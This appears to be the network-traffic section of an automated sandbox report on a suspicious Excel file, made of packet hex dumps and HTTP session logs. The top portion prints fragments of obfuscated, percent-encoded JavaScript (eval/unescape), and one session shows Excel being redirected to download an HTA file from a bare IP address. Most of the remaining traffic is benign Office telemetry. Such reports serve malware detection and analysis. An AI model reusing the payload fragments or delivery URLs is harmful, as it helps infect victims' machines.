            Data Ascii: 5%25%37%34%25%37%35%25%37%32%25%36%65%25%32%30%25%37%32%25%33%62%25%30%61%25%37%64%25%30%61%27%29%29%3B%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%37%37%2
            Dec 16, 2024 10:06:22.577152014 CET1236INData Raw: 31 25 33 35 25 32 35 25 33 34 25 33 37 25 32 35 25 33 37 25 33 38 25 32 35 25 33 34 25 33 34 25 32 35 25 33 37 25 36 33 25 32 35 25 33 37 25 33 34 25 32 35 25 33 37 25 36 31 25 32 35 25 33 37 25 36 33 25 32 35 25 33 32 25 33 38 25 32 35 25 33 37
            Data Ascii: 1%35%25%34%37%25%37%38%25%34%34%25%37%63%25%37%34%25%37%61%25%37%63%25%32%38%25%37%62%25%36%37%25%37%61%25%36%38%25%34%30%25%32%39%25%37%39%25%34%36%25%38%36%25%35%62%25%33%62%25%35%65%25%36%61%25%37%61%25%36%39%25%37%38%25%37%34%25%35%66%25%3
            Dec 16, 2024 10:06:22.577253103 CET1236INData Raw: 33 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 37 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 36 25 32 35 25 33 31 25 36 31
            Data Ascii: 3%25%31%33%25%31%34%25%31%37%25%31%31%25%31%34%25%31%34%25%31%30%25%31%36%25%31%61%25%31%35%25%31%34%25%31%31%25%31%33%25%31%33%25%31%34%25%31%37%25%31%31%25%31%34%25%31%34%25%31%30%25%31%36%25%31%61%25%31%35%25%31%34%25%31%31%25%31%33%25%31%3
            Dec 16, 2024 10:06:22.577347040 CET1236INData Raw: 35 25 33 36 25 33 37 25 32 35 25 33 35 25 33 33 25 32 35 25 33 35 25 33 34 25 32 35 25 33 37 25 33 39 25 32 35 25 33 36 25 36 34 25 32 35 25 33 37 25 36 35 25 32 35 25 33 34 25 36 33 25 32 35 25 33 37 25 33 32 25 32 35 25 33 35 25 33 37 25 32 35
            Data Ascii: 5%36%37%25%35%33%25%35%34%25%37%39%25%36%64%25%37%65%25%34%63%25%37%32%25%35%37%25%37%33%25%37%63%25%34%63%25%37%66%25%37%66%25%36%62%25%36%36%25%36%34%25%36%64%25%38%31%25%35%39%25%37%33%25%37%65%25%35%65%25%37%34%25%37%35%25%37%62%25%35%30%2
            Dec 16, 2024 10:06:22.577358007 CET1236INData Raw: 37 25 33 37 25 32 35 25 33 36 25 36 35 25 32 35 25 33 36 25 36 33 25 32 35 25 33 37 25 33 38 25 32 35 25 33 35 25 36 34 25 32 35 25 33 35 25 33 39 25 32 35 25 33 37 25 33 33 25 32 35 25 33 38 25 36 32 25 32 35 25 33 37 25 33 35 25 32 35 25 33 37
            Data Ascii: 7%37%25%36%65%25%36%63%25%37%38%25%35%64%25%35%39%25%37%33%25%38%62%25%37%35%25%37%35%25%34%39%25%36%65%25%38%33%25%36%61%25%35%31%25%37%61%25%35%38%25%37%37%25%34%64%25%37%64%25%36%61%25%35%39%25%35%35%25%37%62%25%34%61%25%35%64%25%37%36%25%3
            Dec 16, 2024 10:06:22.577368975 CET1236INData Raw: 31 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 37 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34
            Data Ascii: 1%25%31%35%25%31%34%25%31%31%25%31%33%25%31%33%25%31%34%25%31%37%25%31%31%25%31%34%25%31%34%25%31%30%25%31%36%25%31%61%25%31%35%25%31%34%25%31%31%25%31%33%25%31%33%25%31%34%25%31%37%25%31%31%25%31%34%25%31%34%25%31%30%25%31%36%25%31%61%25%31%3
            Dec 16, 2024 10:06:22.577379942 CET1236INData Raw: 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 36 25 32 35 25 33 31 25 36 31 25 32 35 25 33 31 25 33 35 25 32 35 25 33 33 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35
            Data Ascii: 5%31%31%25%31%34%25%31%34%25%31%30%25%31%36%25%31%61%25%31%35%25%33%33%25%31%31%25%31%33%25%31%33%25%31%34%25%31%37%25%31%31%25%31%34%25%31%34%25%31%30%25%31%36%25%31%61%25%31%35%25%31%34%25%31%31%25%31%33%25%31%33%25%31%34%25%31%37%25%31%31%2
            Dec 16, 2024 10:06:22.696959972 CET1236INData Raw: 31 25 33 34 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 37 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31
            Data Ascii: 1%34%25%31%31%25%31%33%25%31%33%25%31%34%25%31%37%25%31%31%25%31%34%25%31%34%25%31%30%25%31%36%25%31%61%25%31%35%25%31%34%25%31%31%25%31%33%25%31%33%25%31%34%25%31%37%25%31%31%25%31%34%25%31%34%25%31%30%25%31%36%25%31%61%25%31%35%25%31%34%25%3


            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.2549724170.82.173.304432696C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            TimestampBytes transferredDirectionData
            2024-12-16 09:06:20 UTC245OUTGET /SEyYcvw9Ev?&timeline=adorable&female HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Host: curt.wiz.co
            Connection: Keep-Alive
            2024-12-16 09:06:21 UTC983INHTTP/1.1 302 Found
            Date: Mon, 16 Dec 2024 09:06:21 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 108
            Connection: close
            Set-Cookie: sess=123; path=/; Secure; HttpOnly
            Location: http://192.3.122.159/121/vfc/clearentirethingwithbestnoticetheeverythinggooodfrome.hta
            Strict-Transport-Security: max-age=31536000; includeSubDomains
            x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
            X-DNS-Prefetch-Control: off
            X-Frame-Options: SAMEORIGIN
            X-Download-Options: noopen
            X-Content-Type-Options: nosniff
            X-XSS-Protection: 1; mode=block
            Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
            Referrer-Policy: strict-origin
            Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
            X-GoCache-CacheStatus: BYPASS
            2024-12-16 09:06:21 UTC108INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 32 32 2e 31 35 39 2f 31 32 31 2f 76 66 63 2f 63 6c 65 61 72 65 6e 74 69 72 65 74 68 69 6e 67 77 69 74 68 62 65 73 74 6e 6f 74 69 63 65 74 68 65 65 76 65 72 79 74 68 69 6e 67 67 6f 6f 6f 64 66 72 6f 6d 65 2e 68 74 61
            Data Ascii: Found. Redirecting to http://192.3.122.159/121/vfc/clearentirethingwithbestnoticetheeverythinggooodfrome.hta


            Session IDSource IPSource PortDestination IPDestination Port
            1192.168.2.254972913.107.246.63443
            TimestampBytes transferredDirectionData
            2024-12-16 09:06:22 UTC222OUTGET /rules/officeclicktorun.exe-Production-v19.bundle HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18129; Pro)
            Host: otelrules.svc.static.microsoft
            2024-12-16 09:06:23 UTC471INHTTP/1.1 200 OK
            Date: Mon, 16 Dec 2024 09:06:23 GMT
            Content-Type: text/plain
            Content-Length: 377760
            Connection: close
            Vary: Accept-Encoding
            Cache-Control: public
            Last-Modified: Sun, 15 Dec 2024 16:03:00 GMT
            ETag: "0x8DD1D21F2E265EA"
            x-ms-request-id: 4e9e4142-e01e-0051-296f-4f84b2000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241216T090623Z-156796c549b962xshC1EWRx3hc00000008f00000000021b8
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-12-16 09:06:23 UTC15913INData Raw: 31 32 30 31 30 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 31 30 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 52 65 73 75 6d 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 33 22 20 49 3d 22 33 30 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20
            Data Ascii: 120100v3+<?xml version="1.0" encoding="utf-8"?><R Id="120100" V="3" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <A T="2" E="TelemetryResume" /> <TI T="3" I="30s" /> <R T="4" R="120100" /> <TH
            2024-12-16 09:06:23 UTC16384INData Raw: 49 3d 22 31 32 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 4f 66 66 69 63 65 4d 69 6e 6f 72 56 65 72 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 4f 66 66 69 63 65 56 65 72 73 69 6f 6e 4d 69 6e 6f 72 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 33 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 41 70 70 53 74 61 74 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 41 70 70 53 74 61 74 65 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 34 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 4f 66 66 69 63 65 4d 75 69 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22
            Data Ascii: I="12" O="true" N="OfficeMinorVer"> <S T="1" F="OfficeVersionMinor" M="Ignore" /> </C> <C T="U32" I="13" O="true" N="AppState"> <S T="1" F="AppState" M="Ignore" /> </C> <C T="U32" I="14" O="true" N="OfficeMuiCount"> <S T="2" F="
            2024-12-16 09:06:23 UTC16384INData Raw: 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 55 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 54 48 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 48 55 41 57 45 49 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a
            Data Ascii: <U T="EqualsNull"> <S T="1" F="0" M="Ignore" /> </U> </L> <R> <V V="false" T="B" /> </R> </O> </TH> </S> <C T="W" I="0" O="false"> <V V="HUAWEI" T="W" /> </C>
            2024-12-16 09:06:23 UTC16384INData Raw: 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 32 30 36 36 38 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20
            Data Ascii: false"> <S T="1" F="1" M="Ignore" /> </C> <T> <S T="1" /> </T></R><$!#>120668v0+<?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O
            2024-12-16 09:06:23 UTC16384INData Raw: 56 65 72 62 6f 73 65 20 4d 65 64 69 75 6d 20 4d 6f 6e 69 74 6f 72 61 62 6c 65 20 55 6e 65 78 70 65 63 74 65 64 20 41 73 73 65 72 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4e 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 55 4c 53 5f 54 61 67 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 32 38 31 34 38 35 31 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20
            Data Ascii: Verbose Medium Monitorable Unexpected Assert" /> <F T="2"> <O T="AND"> <L> <O T="NE"> <L> <S T="1" F="ULS_Tag" /> </L> <R> <V V="22814851" T="U32" />
            2024-12-16 09:06:23 UTC16384INData Raw: 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4e 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 55 4c 53 5f 54 61 67 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 37 36 30 32 34 36 36 37 22 20 54 3d 22 55 33 32 22
            Data Ascii: AND"> <L> <O T="NE"> <L> <S T="1" F="ULS_Tag" /> </L> <R> <V V="576024667" T="U32"
            2024-12-16 09:06:23 UTC16384INData Raw: 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4e 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: /> </R> </O> </L> <R> <O T="NE"> <L>
            2024-12-16 09:06:23 UTC16384INData Raw: 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4e 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 55 4c 53 5f 54 61 67 22 20 2f 3e 0d 0a 20 20
            Data Ascii: <O T="AND"> <L> <O T="AND"> <L> <O T="NE"> <L> <S T="1" F="ULS_Tag" />
            2024-12-16 09:06:23 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 39 31 38 30 30 30 33 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: </L> <R> <V V="9180003" T="U32" /> </R> </O> </L>
            2024-12-16 09:06:23 UTC16384INData Raw: 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 33 30 31 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 43 6c 69 63 6b 54 6f 52 75 6e 2e 52 75 6c 65 54 65 6c 65 6d 65 74 72 79 2e 43 32 52 54 61 67 35 36 76 31 35 22 20 41 54 54 3d 22 30 64 61 31 39 31 37 61 61 35 36 30 34 30 64 33 61 30 31 31 63 33 38 31 33 63 61 33 36 31 30 37 2d 37 36 66 30 38 30 64 38 2d 62 33 37 66 2d 34 36 33 35 2d 38 30 35 34 2d 35 63 31 33 33 66 63 64 30 34 63 34 2d 36 35 38 37 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 35 36 76 31 35 22 20 2f 3e 0d 0a 20 20
            Data Ascii: l version="1.0" encoding="utf-8"?><R Id="230174" V="0" DC="SM" EN="Office.ClickToRun.RuleTelemetry.C2RTag56v15" ATT="0da1917aa56040d3a011c3813ca36107-76f080d8-b37f-4635-8054-5c133fcd04c4-6587" DCa="PSP" xmlns=""> <S> <UTS T="1" Id="56v15" />


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.254974713.107.246.634438188C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            TimestampBytes transferredDirectionData
            2024-12-16 09:07:00 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
            Host: otelrules.svc.static.microsoft
            2024-12-16 09:07:00 UTC500INHTTP/1.1 200 OK
            Date: Mon, 16 Dec 2024 09:07:00 GMT
            Content-Type: text/plain
            Content-Length: 1113975
            Connection: close
            Vary: Accept-Encoding
            Cache-Control: public
            Last-Modified: Sun, 15 Dec 2024 16:03:00 GMT
            ETag: "0x8DD1D21F2F6AE4C"
            x-ms-request-id: 8d1f2229-801e-00ac-5168-4ffd65000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241216T090700Z-156796c549b962xshC1EWRx3hc00000008cg00000000342h
            x-fd-int-roxy-purgeid: 0
            X-Cache-Info: L2_T2
            X-Cache: TCP_REMOTE_HIT
            Accept-Ranges: bytes
            2024-12-16 09:07:00 UTC15884INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
            Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
            2024-12-16 09:07:00 UTC16384INData Raw: 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43
            Data Ascii: S T="1" /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C
            2024-12-16 09:07:00 UTC16384INData Raw: 20 20 20 3c 2f 41 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43
            Data Ascii: </A> </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C
            2024-12-16 09:07:01 UTC16384INData Raw: 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: "AND"> <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE">
